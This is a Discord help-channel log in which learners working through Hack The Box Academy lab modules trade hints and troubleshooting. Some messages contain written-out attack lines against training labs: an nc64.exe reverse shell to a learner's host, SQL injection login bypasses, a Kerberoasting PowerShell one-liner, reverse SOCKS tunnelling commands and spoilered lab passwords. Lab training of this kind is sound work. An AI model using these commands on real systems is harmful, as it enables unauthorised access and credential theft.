#modules


rustic sage
#

same error

surreal beacon
#

@acoustic willow anything?

vital adder
#

@rustic sage working fine for me when running klist do you see LINUX01$ ticket info?

rustic sage
#

the one we talked about before didnt work

vital adder
#

yea that isn't right shoot me a dm with your ||kinit|| command (spoiler reason)

rustic sage
#

and i literally can't find any more type keytab file

acoustic willow
vital adder
#

yeah this isn't the place for that, plus you joined the THM Discord like a month ago, 2 days apart from the HTB Discord, and your account isn't verified on both sides, but either way this channel is for HTB Academy modules

shadow current
#

ok

balmy saffron
#

Hello,
In Attacking Common Services - FTP, the FTP service has not shown up since yesterday despite restarting the target.
```
┌─[us-academy-1]─[10.10.14.68]─[htb-ac-746322@htb-epoa3o85ku]─[~]
└──╼ [★]$ nmap 10.129.168.77 -sC -sV -p2121,21
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-09 15:54 BST
Nmap scan report for 10.129.168.77
Host is up (0.0037s latency).

PORT STATE SERVICE VERSION
21/tcp closed ftp
2121/tcp closed ccproxy-ftp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
```

vital adder
#

reset the target machine a few times; if that doesn't fix the issue, contact support (this is a known bug)

balmy saffron
#

thx

potent nebula
#

```
daniel@MARKUP C:\Log-Management>C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.9 1234
This version of C:\Log-Management\nc64.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.
```
I downloaded nc.exe, no result
help me

vital adder
autumn pilot
#

starting point -> markup

potent nebula
#

sorry

surreal beacon
potent nebula
#

yes

surreal beacon
#

im really stuck for days

#

thanks.

potent nebula
#

starting point -> markup

autumn pilot
vital adder
#

this channel is for HTB academy

surreal beacon
#

@autumn pilot why?

autumn pilot
#

because it will not help you understand the topic

surreal beacon
#

i want hints anyways

#

i did understand it

autumn pilot
#

well you ask for steps, not hints

surreal beacon
#

same thing

autumn pilot
#

not quite

surreal beacon
#

most likely

vital adder
autumn pilot
#

you will benefit more from trying to build a question on X and Y, and try to provide some steps that you've done so far without providing any spoilers

misty current
autumn pilot
#

attempting and pushing yourself to ask the appropriate question benefits you more than anyone else

analog dock
#

How do you guys take notes? I’m very used to just remembering things and knowing where to find them again, but I’m always impressed by the notes some people take. I think it would be a good time saver for me

vital adder
#

if you are asking about the program then personally i use obsidian

analog dock
#

I saw obsidian was recommended and I downloaded it yeah, but do you guys use templates or something? Or just put in stuff as you go

misty current
#

I'm new to note-taking too, I'd say find your own style. Make a lot of mistakes, observe and revamp your notes. When a template style clicks for you, stick with it.

#

I built my notes based on Academy modules and every time I use them for an assessment or boxes, I kinda re-arrange/delete/add things to make it easier to find.

analog dock
#

I guess I could make notes per port/service

vital adder
#

for the notes I would say it's more on the personal side for each person, but this is a snippet of how I noted boxes in Offshore

analog dock
vital adder
#

yeah don't take it from me, I'm new to good note taking too 😅 and I do remember TCM had some video on note taking a while back and I think they did have a note-taking app ranking or something like that some time ago, so maybe give that a try

vital adder
analog dock
#

Will probably spend a couple of days to set up everything. enumeration per port, privesc, cheatsheets etc

#

And then will look for some template for box/environment reports

vital adder
#

the worst thing is if you forgot to note anything down after, like, god knows how many steps of hacking a lab and you have to write your "good notes" from the dump file you call notes 🤣 (talking from experience)

autumn pilot
vital wedge
#

hi

gentle root
autumn pilot
#

greenshot I guess

surreal beacon
#

im tired of this

acoustic owl
surreal beacon
#

Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.

acoustic owl
surreal beacon
#

i did

#

@acoustic owl

#

but idk what commands to execute

#

im also logged in

#

im legit lost

acoustic owl
surreal beacon
#

hint is easier i tried everything

acoustic owl
acoustic owl
acoustic owl
grim sierra
#

Could I please get a nudge on the "INFORMATION GATHERING - WEB EDITION" model?

#

I have the answer but am having an issue recovering the flag. (Or im wrong, lol)

acoustic owl
grim sierra
acoustic owl
#

You are logged in in MS01?
|| Inveigh.exe || will be your friend

blazing crypt
#

Ah darn, how did I not check that...

acoustic owl
#

A very general tip.
BloodHound is really great, but it doesn't help in every situation

Think of it as a tool, not an all-purpose magic bullet

zinc marsh
#

is there any way to fix xfreerdp with a black screen?

#

i have been getting that error all week while doing the AD enumeration and attacks module

misty current
#

🪄

summer lava
worthy reef
#

Anyone had any experience with the Introduction to Threat Hunting & Hunting with Elastic module? Really struggling on the skills assessment.

vital quiver
#

tip for module Footprinting - IMAP/POP3, if stuck on last 2 questions install evolution

worthy reef
#

Would you be able to give any pointers on the second hunt in the skills assessment?

#

@zinc marsh

rustic sage
rustic sage
misty current
#

did you try just with ''

rustic sage
sweet relic
#

i have a problem with the machine cause it doesn't react even to ping

solar zodiac
#

Hi everyone! Has anyone done the kerberos attacks module? I can't get the impacket-getST command to work... was wondering if anyone could help

autumn pilot
#

which section

solar zodiac
#

the linux rbcd section

#

not sure what im doing wrong

#

im getting a KRB_AP_ERR_BADMATCH error

autumn pilot
#

try to use the one from impacket/examples

#

and see if it will make any difference

solar zodiac
#

im still getting the error

#

copy/pasting the command from academy

worthy reef
#

ughh

#

one task is stopping me smh

keen compass
#

Hi all, on PASSWORD ATTACKS > Protected Files
Question : Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
Am I supposed to have previously cracked this account?

solar zodiac
#

strange.. when i opened a new bash terminal it worked

#

the exact same command

#

im a whole different level of confused now

#

lol

keen compass
#

do you still have the "non working terminal" ? if so, you might compare env vars that are set (especially if there is a KRB5CCNAME set)

solar zodiac
#

yeah so I used kdestroy

sweet relic
#

i have a problem with machines cause i can't connect to any

solar zodiac
#

and it still tried to use my ccache file

#

although I didnt specify -k

sweet relic
#

openvpn is on

keen compass
sweet relic
#

problem is otherwise

solar zodiac
sweet relic
#

cause i try from included terminal

#

and still not work

solar zodiac
#

yeah I think it was just trying to use a ccache file

sweet relic
#

wrote to support already but no response

solar zodiac
#

from the terminal

#

although I didnt type -k

keen compass
#

I don't use the included term but I think it relies on the Pwn box. Each time the pwnbox is up, you can't use your VM's VPN.

keen compass
keen compass
# sweet relic problem is otherwise

even if the VPN is up there might be some other stuff preventing you to access the VM.
Please try this :

  • stop the pwnbox
  • download a new VPN connection profile
  • start the VPN from your VM
  • try to ping the target
#

if that doesn't work, try this :

  • stop the VPN from your VM
  • start the pwnbox
  • try to ping the target
#

if that still doesn't work :

  • respawn the target and try again all the previous steps
#

if still nothing : complain to HTB staff 😉

#

(I would even say you may first try all this using the pwnbox. When it works on the pwnbox, try to make it work on your own machine.)

keen compass
lost rivet
#

Hello

#

I had a question I need help with

#

What Hashing protocol is capable of symmetric and asymmetric cryptography?

keen compass
#

we don't talk about hashing protocols but algorithms

barren sedge
#

just a quick question am I the only person having trouble getting onto HTB?

lost rivet
keen compass
#

they use the term "hashing protocol" ?

lost rivet
#

Sorry didn’t get what u said

barren sedge
#

I just cant even login to htb

rustic sage
barren sedge
#

I have been logging into the wrong fucking thing for far too long im soooo mad rn

zinc marsh
#

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

#

what is the -B12 used for?

keen compass
keen compass
sweet relic
#

let me check

#

tried a lot of resets of target machine

#

but target doesnt respond

#

at all

#

but i checked different module

#

and works perfectly

#

i can't continue this one module cause the servers won't work

zinc marsh
#

someone could give me a hint to dump the hash

#

i tried to upload mimikatz/rubeus
And i also tried to move the sam file to the attacker machine with smbserver

#

wait i think i got it

spiral spoke
#

Hello! How did you realize that it was 'http-enum'? Is it in a category of the NSE? Because http-enum is not shown in the module 🤔

zinc marsh
#

I really need the hint i dumped the sam and there is not user called bross

spiral spoke
# zinc marsh https://nmap.org/search/?q=http

Yeah, but I mean, in the 'Nmap Scripting Engine' section of Network Enumeration with Nmap, it is not 'http-enum' but the categories of NSE, using for example --script banner, vuln, etc.: categories, but 'http-enum' is something more specific that is not inside this module, yet you need it to get the flag 😅

zinc marsh
#

The scripts used for the last scan interact with the webserver and its web application to find out more information about their versions and check various databases to see if there are known vulnerabilities. More information about NSE scripts and the corresponding categories we can find at: https://nmap.org/nsedoc/index.html

#

that is written in the section

spiral spoke
#

Oh, I hadn't noticed this little part RPOGGERS

#

Thank you!

zinc marsh
tough coyote
#

Good evening

winged rune
#

Hi

zinc marsh
red current
#

I've been stuck on this section in Attacking Common Applications for days now. I don't get it at all. I'm on the Attacking WordPress section and I can't even find a single name with the wpscan tool. I've tried several different word and name lists and I come up empty whether I'm using wp-login or xmlrpc. Does anyone here have a hint they can give me or provide some guidance on what I might be doing wrong? I'm using the tool just as it's suggested in the section.

#

Never mind. I didn't realize that it meant to run the wpscan from the previous section on enumerating WordPress! Derp!

zinc marsh
#
```
Get file flag.txt? y
Error opening local file flag.txt
smb: \Users\Administrator\Desktop\>
```
#

why am i getting this error if im admin?

zinc marsh
#

forgot the destination

dusky vale
#

28

karmic wren
#

Why can I not get the lsass.dmp in PowerShell in Attacking LSASS?

fickle thicket
#

The Linux file system is based on the Unix file system, which is a hierarchical structure that is composed of various components. At the top of this structure is the inode table, the basis for the entire file system. The inode table is a table of information associated with each file and directory on a Linux system. Inodes contain metadata about the file or directory, such as its permissions, size, type, owner, and so on. The inode table is like a database of information about every file and directory on a Linux system, allowing the operating system to quickly access and manage files. Files can be stored in the Linux file system in one of two ways:

Regular files
Directories

fickle thicket
fickle thicket
#

so above the root is the inode table?

acoustic owl
# fickle thicket so above the root is the inode table?

Do you need a greater understanding of Linux inodes and file metadata?
Here we take a tour to make sure that we do truly understand inodes in Linux and what they do and contain. Firstly they do not contain the file name. This is stored separately and the file name is linked via the inode number to the inode. The inode itself contains the metadat...

vital zephyr
#

hi all guys, can you explain to me what happened? since yesterday when I tried to connect via openvpn from the laptop it doesn't let me connect from any other device, yet I always use the usual command sudo openvpn -openvfile-

acoustic owl
#

Download the VPN file again
Do you have the PwnBox open? If yes, this may cause problems

vital zephyr
#

I don't have pwnbox open, I use kali

#

kali give me an output like this: time 20, restart 20

acoustic owl
#

Show me a Printscreen

fickle thicket
#

does permission and privilege have the same meaning or are they different?

fickle thicket
#

can you explain? they seem similar but i cannot tell the difference

acoustic owl
surreal beacon
#

How can i copy things to pwnbox?

#

No paste

clever crow
#

I'm currently doing the knowledge check of Getting Started but the webpage is very slow and I can't work with it like this. Any ideas to fix this? Btw I've already restarted the target

rustic sage
misty current
#

It's hard to tell, as I can't remember the code behind that assessment. Can you show me the sql error for that?

obsidian blaze
#

yep in few sec

misty current
obsidian blaze
#

the good one

rustic sage
misty current
#

Also, you might want to mask/hide the answers, so you don't spoil anyone reading this channel.

obsidian blaze
#

oh shit

#

yes

misty current
obsidian blaze
#

||the good one
Executing query: SELECT * FROM logins WHERE username='1' = '1' or '1' = '1'-- -' AND password = '';

Login successful as user: admin||

obsidian blaze
#

||bad one
Executing query: SELECT * FROM logins WHERE username='1'='1'-- -' AND password = '';

Login failed!||

misty current
#

@obsidian blaze From my understanding
The bad one fails because it checks for a username with multiple logical operators and just ultimately results in FALSE, which ends up failing.
Like even if you gave ||SELECT * FROM logins WHERE username='1'-- -' AND password = '';|| it just checks for a username 1 and if the database doesn't hold that value, it returns FALSE, which is again a failed login.

The good one takes the case where, no matter what result you get from username=<logic/value>, regardless of true or false, it'll check with the logical operator on the other end of the OR statement, '1'='1', which is always true. So ultimately just for || username='1' = '1' or '1' = '1' || it's either gonna be (FALSE OR TRUE) or (TRUE OR TRUE); either way, you always get true.

Even this payload should work ||1' or '1' = '1'-- -|| this one might give you some understanding to what I said.

#

Mask this one too.

keen compass
#

Hi, am on : https://academy.hackthebox.com/module/147/section/1322 (Password Attacks > Protected Files)
The question is : Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

What I have tried :

  • try to find kira's password through the FTP service password attack (using mutated_password_list, using rockyou)
  • try to do some password reuse (using the cracked notes.zip file found in kira's home directory from the previously compromised sam username)
  • try to find anything else to loot from the sam account that might help me find kira's password.

Could someone give me a small hint please ?

keen compass
rustic sage
#

guess so

misty current
#

but it's better than having one username going through all the passwords, something like that perspective

misty current
keen compass
zinc marsh
rose furnace
#

help

#

i forgot how to open a file on windows

#

Find the user for the SSH service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.

#

ive got access to the account

#

and i found the flag location

zinc marsh
zinc marsh
misty current
rose furnace
#

nothing comes up

#

just blank

rose furnace
#

so i found the username and password and then i found the location but when i try opening the flag.txt document there is nothing in it

zinc marsh
#

i mean the command is just type

rose furnace
#

oh

#

thank you

rustic sage
zinc marsh
misty current
misty current
zinc marsh
#

always start with the "shortest --> longer" wordlists

full terrace
#

Hi, I'm still stuck in the documentation & reporting part of the CPTS training. "Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.)" I answered ctrl + b + % but it doesn't work, can anyone help me please?

obsidian blaze
#

like in the course

misty current
zinc marsh
#

@misty current have u done the AD enumeration & attacks module?

misty current
#

But, yeah I've done the rest.

pine dagger
#

AD Enumeration is probably the hardest module out of all of them 😄

weary stump
#

someone could help Xuy plz ?

cursive zinc
#

Hi everyone, I'm on the Login Brute Forcing --> skills assessment - website, question 1. I launched an operation that has already taken more than 30 minutes without success

#

Does anyone have an idea of the database I should use in this part?

pine dagger
weary stump
#

I need the answer too

pine dagger
#

And, the order matters, and every key needs square brackets around it.

keen compass
# zinc marsh just reuse them and crack the id_rsa

when you say 'reuse them', you mean reuse previously found passwords from the same target (using the initial foothold with the sam account)? Because there is ||B@tm@n2022!||, ||P@ssw0rd3!|| from the zip file and that's all I had.
I also have the root password ||J0rd@n5|| but I don't remember about will passwords (I didn't take notes 😦 ).
I remember having to use the hint to find the password but since I finished this section, the hint button seems to have disappeared ...

zinc marsh
full terrace
autumn pilot
#

well, everything you need to solve the question is right in front of you, plus the question is based on the material in the section

#

don't overcomplicate it, and read the question again and you will notice the difference

zinc marsh
zinc marsh
#

to ssh

misty current
keen compass
zinc marsh
#

am using the web shell

misty current
#

I think you can too, with administrator prompt. I'm just not sure.
Also, by not working, you mean you were not able to get the hashes right?

misty current
#

Oh, your access is a webshell?

pine dagger
#

I'm not sure how to help you shockp without giving you the answer. 😦

full terrace
#

thanks

zinc marsh
#

also doing it manually i get an error when i run this New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"

misty current
#

how you tried running it might be the problem here then.

zinc marsh
#

should i get a reverse shell?

pine dagger
#

Maybe by saying ||one of those tools does work, but you should use a recently acquired user instead||

zinc marsh
zinc marsh
misty current
distant lodge
#

Hi all, stuck on the footprinting module, easy lab: when trying to connect to ssh I am getting a network unreachable message in the VPN log and the connection is closed. I have reset the target as well as reestablished connection to the VPN, successfully got and set permissions to the ssh keys, can scan p22 which returns open but stuck on the actual connection. Can anyone give me a nudge?

keen compass
keen compass
distant lodge
#

@keen compass I have not - will try that now

pine dagger
misty current
#

There's no necessity for a web shell there hmmm

#

Maybe wrong module link?

pine dagger
#

Huh?

#

I'm talking about the link that shockp linked

#

No web-shell. Just straight RDP.

misty current
misty current
distant lodge
#

@keen compass thanks for the help - worked and lab completed.

keen compass
distant lodge
#

@keen compass yeah I realized that right after I connected and ftp stopped working, good times 😂

zinc marsh
#

A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd!) in place for us to start from in the /uploads directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise.

misty current
#

You shared the wrong module link.

#

At the start

zinc marsh
pine dagger
#

lol

#

Wait

zinc marsh
pine dagger
#

you're asking about the Skill Assessment?

#

Now this makes more sense why you asked about DA

zinc marsh
pine dagger
#

Still Q2?

zinc marsh
zinc marsh
pine dagger
#

No additional tools required then

zinc marsh
#

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"

pine dagger
#

Try using a ||lolbin tool||.

zinc marsh
#

i get an error with this command doing it manually

pine dagger
#

Try with a different account

#

🙂

#

Or try the "All Tickets" method

surreal beacon
surreal beacon
#

the password is my problem

zinc marsh
surreal beacon
#

i have found the hash

#

i just couldn't crack it via john

zinc marsh
#

all what i try doesnt work lol

surreal beacon
#

i obviously used msfconsole with output john

cursive zinc
#

I made a brute force on a web page I get username and password but when I use them it does not work

zinc marsh
#

i dont know use metasploit to crack hashes

#

i always use hashcat or john

surreal beacon
#

it says could not identify

zinc marsh
#

what is the hash

surreal beacon
#

I'll send the original one

pine dagger
#

Really?

#

I just stuck it in a text file and did "john file.txt"

surreal beacon
#

u did?

#

@zinc marsh

#

did u copy it?

pine dagger
#

You probably should remove that

surreal beacon
#

wolf

#

have u figured it out?

pine dagger
#

?

surreal beacon
#

the has

#

hash

#

**

zinc marsh
pine dagger
#

I finished Footprinting months ago

surreal beacon
#

got it?

surreal beacon
pine dagger
#

I'm working through HTTP Attacks, lol

zinc marsh
#

i just searched it in the hash identifier

#

and it works

surreal beacon
#

i didnt try this one

#

i told u its the original one

#

not the john format

#

hash

#

@zinc marsh sha1?

zinc marsh
#

```
Add-Type -AssemblyName System.IdentityModel
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
```

#

@pine dagger am i doing something wrong?

pine dagger
#

If its copied from the example, its probably right

#

Most of the questions from the AD Enumeration are solvable with the correct commands from the earlier chapters

zinc marsh
zinc marsh
#

and i get error lol u did it with the web shell?

pine dagger
#

no. Meterpreter

dull vortex
#

How long should I give hashcat to crack the bitlocker file in the Password attacks hard lab, before moving to a new list? I am using rockyou first.

zinc marsh
zinc marsh
dull vortex
#

I feel like its going to be the mutated list but didn't want to leave rockyou til last in case since it was the example

zinc marsh
#

@pine dagger i needed to do it with a reverse shell

#

and do it interactive

zinc marsh
marble kraken
#

Module: Windows Fundamentals
Problem: Connecting via rdp (xfreerdp or rdesktop linux cli to HTB VPS)

Alright. So two days have passed, I had other things to do in between. A Simple task which should take 5 minutes still hasn't been accomplished:

#
```
└──╼ [★]$ xfreerdp /v:10.129.58.106  /u:htb_student /p:'Academy_WinFun!'
[16:17:53:533] [2593:2594] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[16:17:53:533] [2593:2594] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[16:17:56:610] [2593:2594] [ERROR][com.freerdp.core] - freerdp_post_connect failed
```
#

And yes, I have tried wrapping arguments in all kinds of single or double quotes.

#

This last is from pwnbox

marble kraken
#

no

proud pine
marble kraken
#

well ill try from pwnbox

keen compass
marble kraken
#

nope, from pwnbox also not. But I figured maybe frames are dropped by a firewall

keen compass
#

try to spawn another target (from some other module); one person had a similar issue yesterday related to a specific module

#

just to be sure this is not an HTB "bug" due to some cloud instance not working properly

marble kraken
vagrant gust
#

getting access denied when i try to move the sam files on smb

keen compass
vagrant gust
#

this is for attacking SAM on password attacks

marble kraken
#

Usually they are pingable, right? afaik

keen compass
#

this is why I ask you to first just ping them, that will confirm the VPN works and potential filtering is set properly

marble kraken
#

cause they never were in this module/case

#

ok ill reset all first

keen compass
#

umm I haven't done this module. it is not part of the CPTS path?

surreal beacon
#

rebrec

#

see ur priv

keen compass
zinc marsh
#

someone could help me with chisel?

vagrant gust
zinc marsh
#

i dont get it works in the target machine

vagrant gust
#

however when i run the command to move it the server i get access is denied

keen compass
keen compass
keen compass
keen compass
vagrant gust
vagrant gust
keen compass
# vagrant gust

please, try to stop smbserver, then cd .., then start again smbserver and retry

vagrant gust
#

sorry to waste ur time

zinc marsh
#

@keen compass ./chisel server --reverse -v -p 1234 --socks5

#

.\chisel client -v IP:1234 R:socks

keen compass
keen compass
zinc marsh
#

but i cannot connect with the client

#

do i need to give rights or something? in the target machine

keen compass
# zinc marsh yea

so you don't need the --socks5 (on the server), but anyway this is not your problem.
are you sure you have the exact same version on client and server?
what does the server say (if errors)?
what does the client say?

keen compass
keen compass
zinc marsh
#

i am with a reverse shell so i cannot see the error

keen compass
zinc marsh
surreal beacon
#

@keen compass

zinc marsh
#

PS C:\Users\Administrator\Desktop\chisel\chisel> .\chisel client -v *:1234 R:socks

marble kraken
#

Hm. alright. regarding my xfreerdp connect from Pwnbox: still shows similar connect info (self-signed cert etc.), but this time it worked and gave me an RDP window

#

So., somehow it works now 👍

keen compass
# zinc marsh windows

there might be a Windows Firewall running on this box preventing outgoing connections ?

keen compass
#

which box is it ?

keen compass
zinc marsh
keen compass
# zinc marsh Active directory enumeration & attacks - skills assessment part 1

oh, I am not that far, I won't be able to give much help; at least, if you cannot see the output from the client I may suggest a few things:

  • check if outgoing connections are allowed (run a tcpdump on your attack box, then use either Invoke-WebRequest, nc, whatever on the remote host)
  • if chisel is not running you may try to generate a meterpreter agent (I don't like it, but it may ease the discovery of the remote host, and even provide tooling to set up a tunnel)

proud pine
ashen shard
#

Hey guys, can anyone help me with 'Abusing HTTP Misconfigurations - Skills Assessment 1'? I just need a hint haha

rustic sage
#

Why does crackmapexec think that every credential is correct? How can I fix this? I'm trying to crack the SMB account and dump the hashes.

zinc marsh
proud pine
zinc marsh
#

ty i will try it

keen compass
proud pine
keen compass
#

can you do multiple tunnels at the same time as chisel offer ?

#

@proud pine

proud pine
#

Not sure? Haven't had the need.

keen compass
#

ok, recently I pivoted using chisel doing both:

  • a reverse socks to have access to the whole LAN
  • a standard UDP port forwarding to expose the DC's NTP server to my attack box to time sync
#

anyway I will try your tool, it's always useful to have multiples in your pocket. Thanks for sharing

proud pine
#

Socks/reverse socks both definitely work.

#

I like it for the simplicity.

zinc marsh
#

bruh i broke the revshell by error

#

and now i cannot get it back -.-

fathom pendant
#

Nice

keen compass
#

yep, I understand, might be quickly usable through evil-winrm, and could even not touch the filesystem which is cool too

fathom pendant
#

Classic

keen compass
zinc marsh
#
```
Import-Module .\Invoke-SocksProxy.psm1
Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 192.168.49.130

# Go through the system proxy:
Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 192.168.49.130 -useSystemProxy

# Validate certificate
Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 192.168.49.130 -certFingerprint '93061FDB30D69A435ACF96430744C5CC5473D44E'

# Give up after a number of failed connections to the handler:
Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 192.168.49.130 -maxRetries 10
```
#

@proud pine all this is with the ip where i want to connect?

#

the 192.168.49.130

proud pine
#

Are you trying to do reverse? I think in your chisel example, you were just trying to set up socks, right?

zinc marsh
#

i want to make a tunnel to login with proxychains xfreerdp

#

to 172.16.x.y

proud pine
#

For that, it sounds like you just want the basic
Invoke-SocksProxy -bindPort (port)

zinc marsh
#

and with the ReverseSocksProxyHandler.py

zinc marsh
proud pine
#

DM me, so we can discuss more easily without spamming

cursive zinc
#

Need some help

keen compass
zinc marsh
#

I have been 4 hours stuck here and i am not able to login to ms01

wheat basin
#

Hello Team!
Looking for some help in the section User and Group Management inside of Intro to the Windows Command line (linked below).

https://academy.hackthebox.com/module/167/section/1618

I'm looking for some help on: search for a domain user with the given name of Robert. What is this user's surname?
I swear I have been up and down over this article multiple times, tested at least 20 different ways and am still unable to solve this. After some googling and ChatGPT I'm still not able to solve this.

Help would be appreciated 🙂

cursive zinc
#

Somebody can help me on this section ?

keen compass
cursive zinc
#

Section Skills Assessment website

#

I found the first username and password allowing me to access the next page, but when I still run the brute forcing operation on this last one, I get several usernames and passwords

#

Which however does not work

#

I did

#

Hydra -l user -P password.txt Ip port http-post-form" admin_login......."

blazing crypt
#

Windows Privilege Escalation

Kernel Exploits

I exploited || PrintNightmare || and have a user added that is an administrator. I got a shell as this user, however I can't get the flag from the administrator? Does anyone know what I can do to really become an admin? 🤔

red current
#

Does anyone have any hints they can give on getting the flag in the Attacking WordPress section in Attacking Common Applications?

misty current
#

It'll be really great if someone can point out what that is NotLikeThis

zinc marsh
#

I don't know the domains

blazing crypt
blazing crypt
zinc marsh
#

can't you dump the hash for the administrator?

#

maybe winpeas finds something interesting to privesc

red current
#

I've tried using Metasploit with the usernames and password I have and tried using wp_discuz to find the flag. None of these have worked. Wp_discuz does appear to give me a shell based on the output I get, but I can't appear to do anything with it. None of my bash commands work to do any kind of enumeration. Does anyone have a hint or clue as to what I might be doing wrong?

#

I either get a no such job error or a 404 Not Found error.

fiery berry
blazing crypt
#

I think it's the UAC blocking us.

fiery berry
#

exactly

blazing crypt
#

But I've been trying to bypass it for ages now, not sure if it's even possible haha

fiery berry
#

I haven't tested it personally but should be able to accomplish what we want

blazing crypt
#

With its --bypass-uac flag!

#

Oh that is so lovely. Works like a charm

#

Love it!

red current
#

I'm using locate to find the flag and for some reason it thinks "locate" is part of what I'm searching for. Has anyone seen that before? I've tried using + and %2B to enter my bash script but it just isn't working.

summer lava
red current
#

Nice! @summer lava

#

So, could someone tell me what I'm doing wrong here in trying to get the flag in the Attacking WordPress section in Attacking Common Applications?

#

Is there some other tool I should be using besides Metasploit or wp_discuz.py? Like I said, it looks like wp_discuz gives me a shell, but none of the commands I use in that shell work. It's like it's just a stuck page without any actual access.

misty current
#

I don't remember this but have you tried searching for sensitive files around the site?

red current
#

I can't even change directories.

summer lava
red current
zinc marsh
#

can someone please help me with the 4th question

#

I have been stuck for 5 hours

acoustic owl
acoustic owl
misty current
#

What access do you have, so far?

zinc marsh
zinc marsh
misty current
#

Would help us better to help you lol

zinc marsh
#

Pingsweep, arp -a, ipconfig, ipconfig /all, all the commands with get-domain, proxychains (nmap, crackmapexec, mssql...)

#

I tried to get it through extrasid

#

as well

misty current
#

Yup, you haven't tried it all. You're missing something important.

#

It's the go-to method as soon as you get domain creds

zinc marsh
#

just hit enter

little bear
#

LOL

misty current
#

Enter 🪄

zinc marsh
little bear
#

mood

zinc marsh
#

I need rest

misty current
#

Yeah, that's the solution sometimes lol

zinc marsh
#

I don't even know what the go-to method is lol

misty current
#

It's something that'll give you creds, that's your hint 🙃

zinc marsh
#

I have the creds

misty current
#

other creds

zinc marsh
#

time for lazagne lol

#

or just dump the sam lol

misty current
#

Nah, hunt for the three headed dog.

zinc marsh
#

well time for rubeus then lol

vital horizon
#

Hi guys,
Any hint on the last flag of Linux Privilege please? I've been trying to explore the command that has setuid

acoustic sparrow
#

DM pls

summer lava
rustic sage
#

Hello.

misty current
#

I'm domain admin, so why am I not able to delete this reg key?
I'm currently doing the DnsAdmins Section in Windows PE

acoustic owl
misty current
#

Ah, a log out and log in does the trick? I thought closing the shell session would do the trick but that didn't, so I started to wonder what was happening.

#

Thanks for the explanation.

misty current
#

It's powershell

snow lion
#

What are you doing?

misty current
#

Abusing DnsAdmins group privileges by loading DLLs; every time you do this, it kinda breaks the DNS service, so you've gotta reset stuff to perform the attack again or make the DNS service work properly.

snow lion
#

Are you trying to fix the DNS?

misty current
#

In this case, I'm trying to re-execute the attack with a different payload.

snow lion
#

But, what is this "attack"?

#

What were the commands to do this? How do you load this DLL?

misty current
snow lion
#

Ok.

#

What is the best Linux distribution for cryptography and hacking?

acoustic sparrow
#

got it

velvet leaf
#

Hello everybody I am stuck in the Nibbles machine

buoyant escarp
#

In Linux Privilege Escalation Assessment, I'm on the Tomcat service, successfully authenticated, now I'm on the host-manager and manager pages, but what should I do from now on?!

rustic sage
velvet leaf
#

Anybody experience with the nibbles machine?

#

when I put up a reverse shell and try to download, it is stuck at 0% transfer

#

it sees my http server and sees the file's size

#

but it won't transfer

pine dagger
winged shore
pine dagger
#

It is a box, that is also used in HTB Academy. They didn't say they were doing Getting Started.

rustic sage
keen compass
#

hi

#

I am on the road to root too

rustic sage
keen compass
#

did you pivot ?

rustic sage
#

no, how would I do that?

keen compass
#

there is another user

#

I mean lateral movement

rustic sage
#

dennis?

keen compass
#

yep

rustic sage
#

hmmm I mean I searched all possible interesting config and other files

#

there is no kerberos or anything in place

keen compass
#

I didn't find any interesting config

#

indeed

#

but you can easily get dennis' password

#

read the docx again

rustic sage
#

brute force?

keen compass
#

no

rustic sage
#

ohh right

keen compass
#

GL

#

I am just after this step so don't tease me if you reach that step 😉

rustic sage
#

ohh 🙂 well I didn't find anything in the docx? the root password didn't work and I can't seem to find the mentioned settings file anywhere

#

and I can't access dennis' directory

keen compass
#

the docx provides credentials to some specific service

rustic sage
#

mysql?

keen compass
#

you reused those credentials to ssh into the server but initially the docx was talking about a service

rustic sage
#

hmmm the website?

keen compass
#

instead of asking, just try what you are talking about

#

or do you just want the solution ?

rustic sage
#

not at all, but I just can't connect to either

keen compass
#

I can give it but I don't think it's a good way to learn

#

really ?

rustic sage
#

now I'm just looking over what I missed

keen compass
#

mysql

#

try again

rustic sage
#

I will give it another try

#

nvm I'm stupid, I tried mysql before but forgot the -p<password>..........

keen compass
#

you are not stupid, just always double check what you are doing, and test locally if not sure about something

#

spending 2 more minutes verifying you typed something properly lets you avoid having to try it again later and doubting yourself, so those 2 minutes save you a lot of time in the end

rustic sage
#

true

cursive zinc
#

I need some help with this

#

I have found the username and the password, but when I'm writing the password to get access to the ssh server, I get permission denied

rustic sage
